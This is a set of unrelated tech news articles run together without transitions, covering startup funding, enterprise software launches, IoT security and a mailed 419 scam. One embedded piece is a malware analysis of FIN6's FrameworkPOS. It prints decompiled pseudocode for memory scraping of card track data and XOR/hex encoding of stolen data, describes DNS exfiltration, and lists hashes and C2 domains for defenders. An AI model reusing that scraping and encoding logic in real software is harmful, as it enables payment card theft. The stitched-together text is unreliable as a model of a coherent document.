Vianai emerges with $50M seed and a mission to simplify machine learning tech

You don’t see a startup get a $50 million seed round all that often, but such was the case with Vianai, an early stage startup launched by Vishal Sikka, former Infosys managing director and SAP executive. The company launched recently with a big check and a vision to transform machine learning.

Just this week, the startup had a coming out party at Oracle Open World where Sikka delivered one of the keynotes and demoed the product for attendees. Over the last couple of years, since he left Infosys, Sikka has been thinking about the impact of AI and machine learning on society and the way it is being delivered today. He didn’t much like what he saw.

It’s worth noting that Sikka got his Ph.D. from Stanford with a specialty in AI in 1996, so this isn’t something that’s new to him. What’s changed, as he points out, is the growing compute power and increasing amounts of data, all fueling the current AI push inside business. What he saw when he began exploring how companies are implementing AI and machine learning today, was a lot of complex tooling, which in his view, was far more complex than it needed to be.

He saw dense Jupyter notebooks filled with code. He said that if you looked at a typical machine learning model, and stripped away all of the code, what you found was a series of mathematical expressions underlying the model. He had a vision of making that model-building more about the math, while building a highly visual data science platform from the ground up.

The company has been iterating on a solution over the last year with two core principles in mind: explorability and explainability, which involves interacting with the data and presenting it in a way that helps the user attain their goal faster than the current crop of model-building tools.

“It is about making the system reactive to what the user is doing, making it completely explorable, while making it possible for the developer to experiment with what’s happening in a in a way that is that is incredibly easy. To make it explainable, means being able to go back and forth with the data and the model, using the model to understand the phenomenon that you’re trying to capture in the data,” Sikka told TechCrunch.

He says the tool isn’t just aimed at data scientists, it’s about business users and the data scientists sitting down together and iterating together to get the answers they are seeking, whether it’s finding a way to reduce user churn or discover fraud. These models do not live in a data science vacuum. They all have a business purpose, and he believes the only way to be successful with AI in the enterprise is to have both business users and data scientists sitting together at the same table working with the software to solve a specific problem, while taking advantage of one another’s expertise.

For Sikka, this means refining the actual problem you are trying to solve. “AI is about problem solving, but before you do the problem solving, there is also a [challenge around] finding and articulating a business problem that is relevant to businesses and that has a value to the organization,” he said.

He is very clear, that he isn’t looking to replace humans, but instead wants to use AI to augment human intelligence to solve actual human problems. He points out that this product is not automated machine learning (AutoML), which he considers a deeply flawed idea. “We are not here to automate the jobs of data science practitioners. We are here to augment them,” he said.

As for that massive seed round, Sikka knew it would take a big investment to build a vision like this, and with his reputation and connections, he felt it would be better to get one big investment up front, and he could concentrate on building the product and the company. He says that he was fortunate enough to have investors who believe in the vision, even though as he says, no early business plan survives the test of reality. He didn’t name specific investors, only referring to friends and wealthy and famous people institutions. A company spokesperson reiterated they were not revealing a list of investors at this time.

For now, the company has a new product and plenty of money in the bank to get to profitability, which he states is his ultimate goal. Sikka could have taken a job running a large organization, but like many startup founders, he saw a problem, and he had an idea how to solve it. That was a challenge he couldn’t resist pursuing.

FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

The Zero2Hero malware course continues with Vitali Kremez diving into the FIN6 “FrameworkPOS”, targeting payment card data from Point-of-Sale (POS) or eCommerce systems.

Point-of-Sale (POS) malware remain to be an active threat for financial cybercrime. POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. Some of the most prolific POS malware lately include the “AlinaPOS”, “GlitchPOS”, and “FrameworkPOS”.

After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information.

The FrameworkPOS malware and related variants are linked to the high-profile merchant breaches in the past including the “MozartPOS” variant involved in the Home Depot intrusion. 

POS malware becomes relevant during the Fall shopping season (especially Black Friday) targeting various businesses dealing with live credit card transactions.

Click here to watch the full episode on Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

“FrameworkPOS” Malware Internals

One of the more interesting POS malware is called “FrameworkPOS” variants (including the ones dubbed “GratefulPOS” and “MozartPOS”). This malware most recently was internally named as “psemonitor_x64.dll.” FrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective called FIN6.

 Some of the new FIN6 FrameworkPSS malware variants were spotted by revealing that the group utilizes the 64-bit malware variant with two export functions “workerIntstance” and “debugPoint”.

FIN6 FrameworkPSS malware

Notably, FrameworkPOS malware appears to continue to have low detection ratio according to the detections displayed on VirusTotal (as of September 18, 2019, only 9 out of 66 antivirus engines only treat the malware as suspicious). 

For the malware analysis purposes, we also analyze the earlier FrameworkPOS version with the purported “grp1” campaign identifier and contains debug Track 2 data presumably for testing purposes.

The FrameworkPOS main function flow is as follows as psuedo-coded in C++ from creating the “caller” thread to build out the communication protocol and resolve necessary host information.

The excerpt of the main malware functionality is as follows:

    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0);

    while ( 1 )
    {
      time(&v11);
      hSnapshot = CreateToolhelp32Snapshot(2u, 0);
      if ( hSnapshot == (HANDLE)-1 )
        return 0;
      pe.dwSize = 296;

      if ( !Process32First(hSnapshot, &pe) )
        break;
      do
      {
        v8 = 0;
        for ( j = 0; j < 0x14; ++j )
        {
          if ( !strcmp(pe.szExeFile, &aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )
          {
            v8 = 1;
            break;
          }
        }
        if ( !v8 )
        {
          if ( pe.th32ProcessID )
          {
            dwProcessId = pe.th32ProcessID;
            v14 = 1;
            dword_592514 = 0;
            byte_59136B = 0;
            v89 = check_virtualQuery_ex(pe.th32ProcessID, 1);
            if ( v89 )
            {
              scan_memoryfor_card((int)v89);
              free((int)v89);
              _sleep(200u);
            }
          }
        }
      }
      while ( Process32Next(hSnapshot, &pe) );
      if ( dword_592410 > 0 )
        _sleep(10000u s);
      CloseHandle(hSnapshot);
      time(&v15);
      v15 -= v11;
      localtime(&v15);
    }

The malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in order to speed necessary card scan logic.

Credit Card Scraping Logic & Luhn Algorithm

The malware also validates the card information by running the Luhn algorithm for any purported track data that does not begin with digits “4” (VISA), “5” (Mastercard), “6” (Discover), “34″ (AMEX), “37” (AMEX), “36” (Diner’s Club), and “300-305” (Diner’s Club).

FIN6

The x64 malware version also contains an altered “greedier” version of the Track1/Track2 scanner logic focusing less on static card prefixes and service codes but for any data that looks like Track1/Track2.

FIN6 x64 malware version

FrameworkPOS Data Encoding: XOR & Obfuscation

Throughout its execution, the malware builds some notable strings via xoring the byte section in the loop *(&byte_memory ++) ^= 0x4Dh (via sequence of mov, xor, shl, movsx, and shl calls). Oftentimes, malware coders build string paths to bypass some static anti-virus detection.

FIN6 bypass some static anti-virus detection

Notably, the FrameworkPOS malware obfuscates its stolen data via the hardcoded string and then XOR byte key of “AA” to strings as follows and converts it into hexadecimals adding to snprintf API call:

size_t __cdecl enc_func(char *a1, int a2)
{
  size_t result; 
  unsigned int i;
  for ( len_enc = 0; ; ++len_enc )
  {
    result = strlen(a1);
    if ( len_enc >= result )
      break;
    for ( i = 0; i < 69; ++i )
    {
      if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )
      {
        a1[len_enc] = byte_42E048[i];
        break;
      }
    }
    a1[len_enc] ^= AA_key;
    _snprintf((char *)(a2 + 2 * len_enc), 2u, "%.2x", (unsigned __int8)a1[len_enc]);
  }
  return result;
}

The XOR key function location is as follows:
-------        --------         
Address        Function                                 
-------        --------             
.text:004030DB notice_write_func  
.text:00403847 memory_parser 
.text:00403873 memory_parser 
.text:004039DE memory_parser     
.text:00406C43 computer_name_gen

Command & Control (C2) Protocol

Notably, the FrameworkPOS malware variant leverages hex with 0xAA byte XOR encoding for exfiltrated data with the ping request with the domain name system (DNS) exfiltration protocol.

Credit: @malz_intel

Indicators of Compromise (IOCs):

FrameworkPOS x86 SHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38

FrameworkPOS x64 SHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df

C2:

ns[.]akamai1811[.]com

ns[.]a193-45-3-47-deploy-akamaitechnologies[.]com


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

New Relic launches platform for developers to build custom apps

When Salesforce launched Force.com in 2007 as a place for developers to build applications on top of Salesforce, it was a pivotal moment for the concept of SaaS platforms. Since then, it’s been said that every enterprise SaaS company wants to be a platform play. Today, New Relic achieved that goal when it announced the New Relic One Observability Platform at the company’s FutureStack conference in New York City.

Company co-founder and CEO Lew Cirne explained that in order to be a platform, by definition, it is something that other people can build software on. “What we are shipping is a set of capabilities to enable our customers and partners to build their own observability applications on the very same platform that we’ve built our product,” Cirne told TechCrunch.

He sees these third-party developers building applications to enable additional innovations on top of the New Relic platform that perhaps New Relic’s engineers couldn’t because of time and resource constraints. “There are so many use cases for this data, far more than the engineers that we have at our company could ever do, but a community of people who can do this together can totally unlock the power of this data,” Cirne said.

Like many platform companies, New Relic found that as it expanded its own offering, it required a platform for its developers to access a common set of services to build these additional offerings, and as they built out this platform, it made it possible to open it up to external developers to access the same set of services as the New Relic engineering team.

“What we have is metrics, logs, events and traces coming from our customers’ digital software. So they have access to all that data in real time to build applications, measure the health of their digital business and build applications on top of that. Just as Force.com was the thing that really transformed Salesforce as a company into being a strategic vendor, we think the same thing will happen for us with what we’re offering,” he said.

As a proof point for the platform, the company is releasing a dozen open-source tools built on top of the New Relic platform today in conjunction with the announcement. One example is an application to help identify where companies could be over-spending on their AWS bills. “We’re actually finding 30-40% savings opportunities for them where they’re provisioning larger servers than they need for the workload. Based on the data that we’re analyzing, we’re recommending what the right size deployment should be,” Cirne said.

The New Relic One Observability Platform and the 12 free apps will be available starting today.

Quilt Data launches from stealth with free portal to access petabytes of public data

Quilt Data‘s founders, Kevin Moore and Aneesh Karve, have been hard at work for the last four years building a platform to search for data quickly across vast repositories on AWS S3 storage. The idea is to give data scientists a way to find data in S3 buckets, then package that data in forms that a business can use. Today, the company launched out of stealth with a free data search portal that not only proves what they can do, but also provides valuable access to 3.7 petabytes of public data across 23 S3 repositories.

The public data repository includes publicly available Amazon review data along with satellite images and other high-value public information. The product works like any search engine, where you enter a query, but instead of searching the web or an enterprise repository, it finds the results in S3 storage on AWS.

The results not only include the data you are looking for, it also includes all of the information around the data, such as Jupyter notebooks, the standard workspace that data scientists use to build machine learning models. Data scientists can then use this as the basis for building their own machine learning models.

The public data, which includes more than 10 billion objects, is a resource that data scientists should greatly appreciate it, but Quilt Data is offering access to this data out of more than pure altruism. It’s doing so because it wants to show what the platform is capable of, and in the process hopes to get companies to use the commercial version of the product.

Screen Shot 2019 09 16 at 2.31.53 PM

Quilt Data search results with data about the data found (Image: Quilt Data)

Customers can try Quilt Data for free or subscribe to the product in the Amazon Marketplace. The company charges a flat rate of $550 per month for each S3 bucket. It also offers an enterprise version with priority support, custom features and education and on-boarding for $999 per month for each S3 bucket.

The company was founded in 2015 and was a member of the Y Combinator Summer 2017 cohort. The company has received $4.2 million in seed money so far from Y Combinator, Vertex Ventures, Fuel Capital and Streamlined Ventures, along with other unnamed investors.

Yes, Your IoT Needs Security, Too

Gartner predicted that by the end of 2020 about 25% of attacks on enterprises will involve IoT devices. But investment in IoT security will not measure to this risk level and is only expected to account for 10% security spending, as organizations will likely prefer usability over security.  The characteristics of traditional IoT security solutions will also hamper the adoption, as these are usually cumbersome, expensive and don’t scale well.

IoT Devices Add to the Existing Number of Endpoints

If predictions by Gartner about future trends seems vague, instead look at the recent warning made by Microsoft about Russian Hackers breaching secured networks using simple IoT devices. And this is just the beginning. Today, there are 27 billion IoT devices. This number is expected to increase to 125 billion by just 2030. 

Many of these IoT devices will find their way into enterprises and onto enterprise networks, in the form of smart assistances (Alexa), IP cameras, smart thermostats and other devices, all aimed at increasing convenience and productivity. However, these devices also significantly increase the organizations’ attack surface, adding to the burden of securing the most common IT devices – the endpoint. 

The Challenges of Securing IoT devices in the Corporate Environment

IoT devices and endpoints are similar in some ways – they are connected to the enterprise network, they have an IP address, and some computing power (depending on the type and functionality). But unlike endpoints, IoT devices are usually not deployed in the same planned and organized manner, they are not built with security in mind, and they cannot be installed with proper endpoint protection solutions due to their limited nature (memory size, type of OS, computing power).

Often, these “smart” devices are “rogue” or “shadow IT” devices, which means they are brought from outside the organization without the IT department’s knowledge or supervision, and are connected to the network by Wi-Fi, Bluetooth or other communication protocol, which makes them “transparent” to network monitoring tools. So the first challenge is to discover all these devices. The second challenge is to enforce organizational security and privacy policies regarding these devices (which is impossible to do if you haven’t even detected them). Last but not least, the organization needs to monitor these devices, identify suspicious behavior and then respond if such activity is detected.  

Existing Solutions fall short

Existing security products on the market try to tackle these challenges either by monitoring the traffic or by installing software agents on the devices themselves. The first approach usually requires adding physical appliances to the network and directing traffic there. Other products require capturing the traffic and uploading the logs to a server for processing. Both of these methods are difficult to implement and don’t scale well for organizations with multiple sites and network types. Deploying software agents on the devices themselves is even more impractical – it is possible only for very limited types of devices (security cameras), is not scalable, and does not cater for the “shadow” element in which users bring unsupervised devices into the network.  

SentinelOne solution – “IoT discovery and enforcement”

Aiming to increase the security of enterprises from the threat of IoT devices, SentinelOne took a different path: leveraging existing endpoint security agents as sensors, effectively turning every protected endpoint into a network detection device capable of identifying and controlling every IoT and connected device on a network. Utilizing endpoint security agents obviate the need for installing additional equipment, hence facilitating deployment. Once in use, the Ranger IoT security module identifies all the connected devices and presents them to the security analysts. Every new device connected to the network is identified and added to the monitored devices’ list.

Since it’s not enough to simply know you have a device on your network, the system fingerprints the devices according to operating system and the device’s role. The devices are then presented according to categories (printers, mobile devices, Linux servers, and so on). Fingerprinting also allows alerting when a device is unmanaged or compromised as it will act differently than other devices of the same category. 

Providing security teams with complete visibility, categorization and alerting regarding rogue devices and vulnerabilities, all from the same management console and without having to install addition systems, is the best way to ensure that enterprises proactively prepare themselves to the imminent threat presented by IoT devices.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Salesforce is building an app to gauge a company’s sustainability progress

Salesforce has always tried to be a socially responsible company, encouraging employees to work in the community, giving 1% of its profits to different causes and building and productizing the 1-1-1 philanthropic model. The company now wants to help other organizations be more sustainable to reduce their carbon footprint, and today it announced it is working on a product to help.

Patrick Flynn, VP of sustainability at Salesforce, says that it sees sustainability as a key issue, and one that requires action right now. The question was how Salesforce could help. As a highly successful software company, it decided to put that particular set of skills to work on the problem.

“We’ve been thinking about how can Salesforce really take action in the face of climate change. Climate change is the biggest, most important and most complex challenge humans have ever faced, and we know right now, every individual, every company needs to step forward and do everything it can,” Flynn told TechCrunch.

And to that end, the company is developing the Salesforce Sustainability Cloud, to help track a company’s sustainability efforts. The tool should look familiar to Salesforce customers, but instead of tracking customers or sales, this tool tracks carbon emissions, renewable energy usage and how well a company is meeting its sustainability goals.

Dashboards

Image: Salesforce

The tool works with internal data and third-party data as needed, and is subject to both an internal audit by the Sustainability team and third-party organizations to be sure that Salesforce (and Sustainability Cloud customers) are meeting their goals.

Salesforce has been using this product internally to measure its own sustainability efforts, which Flynn leads. “We use the product to measure our footprint across all sorts of different aspects of our operations from data centers, public cloud, real estate — and we work with third-party providers everywhere we can to have them make their operations cleaner, and more powered by renewable energy and less carbon intensive,” he said. When there is carbon generated, the company uses carbon offsets to finance sustainability projects such as clean cookstoves or helping preserve the Amazon rainforest.

Flynn says increasingly the investor community is looking for proof that companies are building a real, verifiable sustainability program, and the Sustainability Cloud is an effort to provide that information both for Salesforce and for other companies that are in a similar position.

The product is in beta now and is expected to be ready next year. Flynn could not say how much they plan to charge for this service, but he said the goal of the product is positive social impact.

Hear Salesforce chairman, co-founder and CEO Marc Benioff discuss business as the greatest platform for change at Disrupt SF October 2-4. Get your passes to the biggest startup show around. 

Salesforce brings AI power to its search tool

Enterprise search tools have always suffered from the success of Google. Users wanted to find the content they needed internally in the same way they found it on the web. Enterprise search has never been able to meet those lofty expectations, but today Salesforce announced Einstein Search, an AI-powered search tool for Salesforce users that is designed to point them to the exact information for which they are looking.

Will Breetz, VP of product management at Salesforce, says that enterprise search has suffered over the years for a variety of reasons. “Enterprise search has gotten a bad rap, but deservedly so. Part of that is because in many ways it is more difficult than consumer search, and there’s a lot of headwinds,” Breetz explained.

To solve these issues, the company decided to put the power of its Einstein artificial intelligence engine to bear on the problem. For starters, it might not know the popularity of a given topic like Google, but it can learn the behaviors of an individual and deliver the right answer based on a person’s profile, including geography and past activity to deliver a more meaningful answer.

Einstein Search Personal

Image: Salesforce

Next, it allows you to enter natural language search phrasing to find the exact information you need, and the search tool understands and delivers the results. For instance, you could enter, “my open opportunities in Boston” and using natural language understanding, the tool can translate that into the exact set of results you are looking for — your open opportunities in Boston. You could use conventional search to click a series of check boxes to narrow the list of results to only Boston, but this is faster and more efficient.

Finally, based on what the intelligence engine knows about you, and on your search parameters, it can predict the most likely actions you want to take and provide quick action buttons in the results to help you do that, reducing the time to action. It may not seem like much, but each reduced workflow adds up throughout a day, and the idea is to anticipate your requirements and help you get your work done more quickly.

Salesforce appears to have flipped the enterprise search problem. Instead of having a limited set of data being a handicap for enterprise search, it is taking advantage of that, and applying AI to help deliver more meaningful results. It’s for a limited set of findings for now, such as accounts, contacts and opportunities, but the company plans to add options over time.

Aliro comes out of stealth with $2.7M to ‘democratize’ quantum computing with developer tools

It’s still early days for quantum computing, but we’re nonetheless seeing an interesting group of startups emerging that are helping the world take advantage of the new technology now. Aliro Technologies, a Harvard startup that has built a platform for developers to code more easily for quantum environments — “write once, run anywhere” is one of the startup’s mottos — is today coming out of stealth and announcing its first funding of $2.7 million to get it off the ground.

The seed round is being led Flybridge Capital Partners, with participation from Crosslink Ventures and Samsung NEXT’s Q Fund, a fund the corporate investor launched last year dedicated specifically to emerging areas like quantum computing and AI.

Aliro is wading into the market at a key moment in the development of quantum computing.

While vendors continue to build new quantum hardware to be able to tackle the kinds of complex calculations that cannot be handled by current binary-based machines, for example around medicine discovery, or multi-variabled forecasting — just today IBM announced plans for a 53-qubit device — even so, it’s widely acknowledged that the computers that have been built so far face a number of critical problems that will hamper wide adoption.

The interesting development of recent times is the emergence of startups that are tackling these specific critical problems, dovetailing that progress with that of building the hardware itself. Take the fact that quantum machines so far have been too prone to error when used for extended amounts of time: last week, I wrote about a startup called Q-CTRL that has built firmware that sits on top of the machines to identify when errors are creeping in and provide fixes to stave off crashes.

The specific area that Aliro is addressing is the fact that quantum hardware is still very fragmented: each machine has its own proprietary language and operating techniques and sometimes even purpose for which it’s been optimised. It’s a landscape that is challenging for specialists to engage in, let alone the wider world of developers.

“We’re at the early stage of the hardware, where quantum computers have no standardisation, even those based on the same technology have different qubits (the basic building block of quantum activity) and connectivity. It’s like digital computing in 1940s,” said CEO and chairman Jim Ricotta. (The company is co-founded by Harvard computational materials science professor Prineha Narang along with Michael Cubeddu and Will Finegan, who are actually still undergraduate students at the university.)

“Because it’s a different style of computing, software developers are not used to quantum circuits,” said Ricotta, and engaging with them is “not the same as using procedural languages. There is a steep on-ramp from high-performance classical computing to quantum computing.”

While Aliro is coming out of stealth, it appears that the company is not being specific with details about how its platform actually works. But the basic idea is that Aliro’s platform will essentially be an engine that will let developers work in the languages that they know, and identify problems that they would like to solve; it will then assess the code and provide a channel for how to optimise that code and put it into quantum-ready language, and suggest the best machine to process the task.

The development points to an interesting way that we may well see quantum computing develop, at least in its early stages. Today, we have a handful of companies building and working on quantum computers, but there is still a question mark over whether these kinds of machines will ever be widely deployed, or if — like cloud computing — they will exist among a smaller amount of providers that will provide access to them on-demand, SaaS-style. Such a model would seem to fit with how much computing is sold today in the form of instances, and would open the door to large cloud names like Amazon, Google and Microsoft playing a big role in how this would be disseminated.

Such questions are still theoretical, of course, given some of the underlying problems that have yet to be fixed, but the march of progress seems inevitable, with forecasts predicting that quantum computing is likely to be a $2.2 billion industry by 2025, and if this is a route that is taken, the middlemen like Aliro could play an important role.

“I have been working with the Aliro team for the past year and could not be more excited about the opportunity to help them build a foundational company in Quantum Computing software, “ said David Aronoff, general partner at Flybridge, in a statement. “Their innovative approach and unique combination of leading Quantum researchers and a world-class proven executive team, make Aliro a formidable player in this exciting new sector.

“At Samsung NEXT we are focused on what the world will look like in the future, helping to make that a reality,” said Ajay Singh, Samsung NEXT’s Q Fund, in a statement. “We were drawn to Prineha and her team by their impressive backgrounds and extent of research into quantum computing. We believe that Aliro’s unique software products will revolutionize the entire category, by speeding up the inflection point where quantum becomes as accessible as classical computing. This could have implications on anything from drug discovery, materials development or chemistry. Aliro’s ability to map quantum circuits to heterogeneous hardware in an efficient way will be truly transformative and we’re thrilled to be on this journey with them.”

Tableau update uses AI to increase speed to insight

Tableau was acquired by Salesforce earlier this year for $15.7 billion, but long before that, the company had been working on its fall update, and today it announced several new tools, including a new feature called “Explain Data” that uses AI to get to insight quickly.

“What Explain Data does is it moves users from understanding what happened to why it might have happened by automatically uncovering and explaining what’s going on in your data. So what we’ve done is we’ve embedded a sophisticated statistical engine in Tableau, that when launched automatically analyzes all the data on behalf of the user, and brings up possible explanations of the most relevant factors that are driving a particular data point,” Tableau chief product officer, Francois Ajenstat explained.

He added that what this really means is that it saves users time by automatically doing the analysis for them, and It should help them do better analysis by removing biases and helping them dive deep into the data in an automated fashion.

Explain Data Superstore extreme value

Image: Tableau

Ajenstat says this is a major improvement, in that, previously users would have do all of this work manually. “So a human would have to go through every possible combination, and people would find incredible insights, but it was manually driven. Now with this engine, they are able to essentially drive automation to find those insights automatically for the users,” he said.

He says this has two major advantages. First of all, because it’s AI-driven it can deliver meaningful insight much faster, but also it gives a more rigorous perspective of the data.

In addition, the company announced a new Catalog feature, which provides data bread crumbs with the source of the data, so users can know where the data came from, and whether it’s relevant or trustworthy.

Finally, the company announced a new server management tool that helps companies with broad Tableau deployment across a large organization to manage those deployments in a more centralized way.

All of these features are available starting today for Tableau customers.

Before He Spammed You, this Sly Prince Stalked Your Mailbox

A reader forwarded what he briefly imagined might be a bold, if potentially costly, innovation on the old Nigerian prince scam that asks for help squirreling away millions in unclaimed fortune: It was sent via the U.S. Postal Service, with a postmarked stamp and everything.

In truth these old fashioned “advance fee” or “419” scams predate email and have circulated via postal mail in various forms and countries over the years.

The recent one pictured below asks for help in laundering some $11.6 million from an important dead person that anyway has access to a secret stash of cash. Any suckers who bite are strung along for weeks while imaginary extortionists or crooked employees at these bureaucratic institutions demand licenses, bribes or other payments before disbursing any funds. Those funds never arrive, no matter how much money the sucker gives up.

This type of “advance fee” or “419” scam letter is common in spam, probably less so via USPS.

It’s easy to laugh at this letter, because it’s sometimes funny when scammers try so hard. But then again, maybe the joke’s on us because sending these scams via USPS makes them even more appealing to the people most vulnerable: Older individuals with access to cash but maybe not all their marbles. 

Sure, the lure costs $.55 up front. But a handful of successful responses to thousands of mailers could net fortunes for these guys phishing it old school.

The losses from these types of scams are sometimes hard to track because so many go unreported. But they are often perpetrated by the same people involved in romance scams online and in so-called ‘business email compromise” or BEC fraud, wherein the scammers try to spoof the boss at a major company in a bid to get wire payment for an “urgent” (read: fraudulent) invoice.

These scam letters are sometimes called 419 scams in reference to the penal code for dealing with such crimes in Nigeria, a perennial source of 419 letter schemes. A recent bust of a Nigerian gang targeted by the FBI gives some perspective on the money-making abilities of a $10 million ring that was running these scams all day long.

Reportedly, in the first seven months of 2019 alone the FBI received nearly 14,000 complaints reporting BEC scams with a total loss of around $1.1 billion—a figure that nearly matches losses reported for all of 2018.